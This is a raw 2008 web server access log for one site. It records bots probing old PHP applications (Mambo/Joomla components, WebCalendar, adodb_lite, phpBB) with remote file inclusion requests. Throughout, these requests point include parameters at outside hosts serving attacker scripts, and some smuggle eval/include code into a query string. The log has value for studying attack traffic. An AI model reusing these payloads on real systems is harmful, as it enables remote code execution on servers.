64.135.71.20 - - [29/Nov/2008:08:22:57 -0800] "GET /logs/access_080530.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.135.71.20 - - [29/Nov/2008:08:22:57 -0800] "GET /index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 200 95152 "-" "libwww-perl/5.805" "www.dmulk.com"
69.50.211.121 - - [29/Nov/2008:08:24:02 -0800] "GET /includes/class_item.php?fileExtension=http://www.welcometoreason.com/media/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
69.50.211.121 - - [29/Nov/2008:08:24:03 -0800] "GET /logs/includes/class_item.php?fileExtension=http://www.welcometoreason.com/media/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
67.159.26.192 - - [29/Nov/2008:08:24:07 -0800] "GET /logs/access_080525.log//administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.ctg.su/system/ec.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
216.246.60.183 - - [29/Nov/2008:08:24:52 -0800] "GET /logs/access_080303.log//MAMBO_path/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.hondooo.de//components/com_extcalendar/lib/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.246.60.183 - - [29/Nov/2008:08:24:52 -0800] "GET /MAMBO_path/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.hondooo.de//components/com_extcalendar/lib/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.246.60.183 - - [29/Nov/2008:08:24:52 -0800] "GET /logs//MAMBO_path/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.hondooo.de//components/com_extcalendar/lib/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.246.60.183 - - [29/Nov/2008:08:24:52 -0800] "GET /logs/access_080207.log//MAMBO_path/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.hondooo.de//components/com_extcalendar/lib/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.246.60.183 - - [29/Nov/2008:08:24:53 -0800] "GET /MAMBO_path/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.hondooo.de//components/com_extcalendar/lib/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.246.60.183 - - [29/Nov/2008:08:24:53 -0800] "GET /logs//MAMBO_path/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.hondooo.de//components/com_extcalendar/lib/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.246.60.183 - - [29/Nov/2008:08:24:53 -0800] "GET /logs/access_080303.log//MAMBO_path/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.hondooo.de//components/com_extcalendar/lib/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.246.60.183 - - [29/Nov/2008:08:24:53 -0800] "GET /logs/access_080207.log//MAMBO_path/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.hondooo.de//components/com_extcalendar/lib/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.246.60.183 - - [29/Nov/2008:08:24:57 -0800] "GET /logs/access_080529.log//MAMBO_path/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.hondooo.de//components/com_extcalendar/lib/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.246.60.183 - - [29/Nov/2008:08:24:57 -0800] "GET /logs/access_080529.log//MAMBO_path/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.hondooo.de//components/com_extcalendar/lib/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
194.187.193.9 - - [29/Nov/2008:08:25:15 -0800] "GET /logs/access_080915.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://gxmag.com/poll/id????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.187.193.9 - - [29/Nov/2008:08:25:16 -0800] "GET /index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://gxmag.com/poll/id????? HTTP/1.1" 200 3711 "-" "libwww-perl/5.803" "www.dmulk.com"
194.187.193.9 - - [29/Nov/2008:08:25:16 -0800] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://gxmag.com/poll/id????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.215.243.76 - - [29/Nov/2008:08:25:21 -0800] "GET /WebCalendar//tools/send_reminders.php?noSet=0&includedir=http://geocities.com/blade_tea/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.215.243.76 - - [29/Nov/2008:08:25:21 -0800] "GET /logs//WebCalendar//tools/send_reminders.php?noSet=0&includedir=http://geocities.com/blade_tea/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.215.243.76 - - [29/Nov/2008:08:25:21 -0800] "GET /logs/access_081029.log//WebCalendar//tools/send_reminders.php?noSet=0&includedir=http://geocities.com/blade_tea/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
194.187.193.9 - - [29/Nov/2008:08:25:29 -0800] "GET /logs/access_080419.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://gxmag.com/poll/id????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.93.165.132 - - [29/Nov/2008:08:25:33 -0800] "GET /logs/access_080530.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://gxmag.com/poll/id????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.40.52.137 - - [29/Nov/2008:08:25:35 -0800] "GET /MAMBO_path/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://dhcom.co.kr/zboard/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.40.52.137 - - [29/Nov/2008:08:25:35 -0800] "GET /logs/MAMBO_path/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://dhcom.co.kr/zboard/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.40.52.137 - - [29/Nov/2008:08:25:35 -0800] "GET /logs/access_080529.log/MAMBO_path/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://dhcom.co.kr/zboard/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.40.52.137 - - [29/Nov/2008:08:25:35 -0800] "GET /logs/access_080303.log/MAMBO_path/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://dhcom.co.kr/zboard/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.246.60.183 - - [29/Nov/2008:08:26:09 -0800] "GET /logs/access_080529.log%20%20//MAMBO_path/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.hondooo.de//components/com_extcalendar/lib/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.246.60.183 - - [29/Nov/2008:08:26:09 -0800] "GET /logs/access_080303.log%20%20//MAMBO_path/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.hondooo.de//components/com_extcalendar/lib/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.239.45.184 - - [29/Nov/2008:08:26:14 -0800] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.239.45.184 - - [29/Nov/2008:08:26:16 -0800] "GET /index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 200 95131 "-" "libwww-perl/5.79" "www.dmulk.com"
216.246.60.183 - - [29/Nov/2008:08:26:26 -0800] "GET /logs/access_080529.log%20%20//MAMBO_path/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.hondooo.de//components/com_extcalendar/lib/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.246.60.183 - - [29/Nov/2008:08:26:26 -0800] "GET /logs/access_080303.log%20%20//MAMBO_path/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.hondooo.de//components/com_extcalendar/lib/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.215.243.76 - - [29/Nov/2008:08:26:35 -0800] "GET /logs/access_081026.log//WebCalendar//tools/send_reminders.php?noSet=0&includedir=http://geocities.com/blade_tea/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.40.52.137 - - [29/Nov/2008:08:27:13 -0800] "GET /logs/access_080529.log%20%20/MAMBO_path/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://dhcom.co.kr/zboard/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.40.52.137 - - [29/Nov/2008:08:27:13 -0800] "GET /logs/access_080303.log%20%20/MAMBO_path/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://dhcom.co.kr/zboard/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.55.13.210 - - [29/Nov/2008:08:27:19 -0800] "GET /logs/access_081027.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.55.13.210 - - [29/Nov/2008:08:27:19 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.55.13.210 - - [29/Nov/2008:08:27:20 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
140.130.101.5 - - [29/Nov/2008:08:27:39 -0800] "GET /logs/access_080529.log//MAMBO_path/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.csjh.tpc.edu.tw/~sw/board/idfeel.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
140.130.101.5 - - [29/Nov/2008:08:27:39 -0800] "GET /logs//MAMBO_path/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.csjh.tpc.edu.tw/~sw/board/idfeel.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
140.130.101.5 - - [29/Nov/2008:08:27:39 -0800] "GET /MAMBO_path/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.csjh.tpc.edu.tw/~sw/board/idfeel.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
140.130.101.5 - - [29/Nov/2008:08:27:39 -0800] "GET /logs/access_080303.log//MAMBO_path/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.csjh.tpc.edu.tw/~sw/board/idfeel.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
121.162.85.6 - - [29/Nov/2008:08:28:00 -0800] "GET /logs/access_080919.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://vn-art.com/components/com_joomfish/includes/idperkosa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.162.85.6 - - [29/Nov/2008:08:28:00 -0800] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://vn-art.com/components/com_joomfish/includes/idperkosa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.162.85.6 - - [29/Nov/2008:08:28:03 -0800] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://vn-art.com/components/com_joomfish/includes/idperkosa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.187.193.9 - - [29/Nov/2008:08:28:06 -0800] "GET /logs/access_080215.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://gxmag.com/poll/id????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.187.193.9 - - [29/Nov/2008:08:28:07 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://gxmag.com/poll/id????? HTTP/1.1" 200 50 "-" "libwww-perl/5.803" "www.dmulk.com"
140.130.101.5 - - [29/Nov/2008:08:28:07 -0800] "GET /MAMBO_path/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.csjh.tpc.edu.tw/~sw/board/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
140.130.101.5 - - [29/Nov/2008:08:28:07 -0800] "GET /logs/access_080303.log//MAMBO_path/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.csjh.tpc.edu.tw/~sw/board/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
140.130.101.5 - - [29/Nov/2008:08:28:07 -0800] "GET /logs//MAMBO_path/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.csjh.tpc.edu.tw/~sw/board/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
194.187.193.9 - - [29/Nov/2008:08:28:08 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://gxmag.com/poll/id????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
140.130.101.5 - - [29/Nov/2008:08:28:11 -0800] "GET /logs/access_080207.log//MAMBO_path/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.csjh.tpc.edu.tw/~sw/board/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
140.130.101.5 - - [29/Nov/2008:08:28:14 -0800] "GET /logs/access_080529.log//MAMBO_path/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.csjh.tpc.edu.tw/~sw/board/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
74.55.13.210 - - [29/Nov/2008:08:29:00 -0800] "GET /logs/access_080227.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.40.52.137 - - [29/Nov/2008:08:29:18 -0800] "GET /logs/access_080207.log/MAMBO_path/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://dhcom.co.kr/zboard/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.64.48.225 - - [29/Nov/2008:08:29:30 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://125.214.65.34/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.64.48.225 - - [29/Nov/2008:08:29:30 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://125.214.65.34/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.64.48.225 - - [29/Nov/2008:08:29:32 -0800] "GET /logs/access_081027.log%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://125.214.65.34/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.187.193.9 - - [29/Nov/2008:08:29:46 -0800] "GET /index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://gxmag.com/poll/id????? HTTP/1.1" 200 3711 "-" "libwww-perl/5.803" "www.dmulk.com"
69.64.48.225 - - [29/Nov/2008:08:29:50 -0800] "GET /logs/access_081107.log%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://125.214.65.34/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
122.203.18.68 - - [29/Nov/2008:08:29:55 -0800] "GET /logs/access_080831.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
122.203.18.68 - - [29/Nov/2008:08:29:56 -0800] "GET /index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 200 95159 "-" "libwww-perl/5.79" "www.dmulk.com"
122.203.18.68 - - [29/Nov/2008:08:29:58 -0800] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
122.203.18.68 - - [29/Nov/2008:08:30:27 -0800] "GET /index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 200 95111 "-" "libwww-perl/5.79" "www.dmulk.com"
74.55.13.210 - - [29/Nov/2008:08:30:44 -0800] "GET /logs/access_081107.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
140.130.101.5 - - [29/Nov/2008:08:30:47 -0800] "GET /logs/access_080321.log//MAMBO_path/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.csjh.tpc.edu.tw/~sw/board/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
210.207.57.39 - - [29/Nov/2008:08:30:54 -0800] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://vn-art.com/components/com_joomfish/includes/idperkosa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.207.57.39 - - [29/Nov/2008:08:30:54 -0800] "GET /logs/access_080919.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://vn-art.com/components/com_joomfish/includes/idperkosa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.207.57.39 - - [29/Nov/2008:08:30:54 -0800] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://vn-art.com/components/com_joomfish/includes/idperkosa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
140.130.101.5 - - [29/Nov/2008:08:30:55 -0800] "GET /logs/access_080321.log//MAMBO_path/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.csjh.tpc.edu.tw/~sw/board/idfeel.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
210.207.57.39 - - [29/Nov/2008:08:30:56 -0800] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://vn-art.com/components/com_joomfish/includes/idperkosa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.207.57.39 - - [29/Nov/2008:08:30:56 -0800] "GET /logs/access_080919.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://vn-art.com/components/com_joomfish/includes/idperkosa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.207.57.39 - - [29/Nov/2008:08:30:56 -0800] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://vn-art.com/components/com_joomfish/includes/idperkosa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
140.130.101.5 - - [29/Nov/2008:08:31:07 -0800] "GET /logs/access_080207.log//MAMBO_path/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.csjh.tpc.edu.tw/~sw/board/idfeel.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
210.207.57.39 - - [29/Nov/2008:08:31:14 -0800] "GET /logs/access_080905.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://vn-art.com/components/com_joomfish/includes/idperkosa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.207.57.39 - - [29/Nov/2008:08:31:20 -0800] "GET /logs/access_080905.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://vn-art.com/components/com_joomfish/includes/idperkosa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.93.165.132 - - [29/Nov/2008:08:31:46 -0800] "GET /index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://gxmag.com/poll/id????? HTTP/1.1" 200 3711 "-" "libwww-perl/5.805" "www.dmulk.com"
122.203.18.68 - - [29/Nov/2008:08:31:52 -0800] "GET /logs/access_080530.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.218.85.18 - - [29/Nov/2008:08:32:02 -0800] "GET /logs/access_080621.log%20/modifyform.html?code=http://emodrago.t35.com/sorgente.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.13.180.43 - - [29/Nov/2008:08:32:11 -0800] "GET /logs/access_081031.log//galeria.php?start=0&kategoria=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
72.13.180.43 - - [29/Nov/2008:08:32:11 -0800] "GET /galeria.php?start=0&kategoria=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
194.187.193.9 - - [29/Nov/2008:08:32:11 -0800] "GET /logs/access_080323.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://gxmag.com/poll/id????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
121.162.85.6 - - [29/Nov/2008:08:32:13 -0800] "GET /logs/access_080928.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://vn-art.com/components/com_joomfish/includes/idperkosa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.238.225.165 - - [29/Nov/2008:08:32:25 -0800] "GET /logs/access_081031.log//galeria.php?start=0&kategoria=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
80.238.225.165 - - [29/Nov/2008:08:32:25 -0800] "GET /logs/access_081031.log//galeria.php?start=0&kategoria=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
72.13.180.43 - - [29/Nov/2008:08:32:25 -0800] "GET /logs/access_081107.log//galeria.php?start=0&kategoria=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
80.238.225.165 - - [29/Nov/2008:08:32:26 -0800] "GET /galeria.php?start=0&kategoria=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
80.238.225.165 - - [29/Nov/2008:08:32:26 -0800] "GET /galeria.php?start=0&kategoria=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
80.238.225.165 - - [29/Nov/2008:08:32:34 -0800] "GET /logs/access_081031.log//galeria.php?start=0&kategoria=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
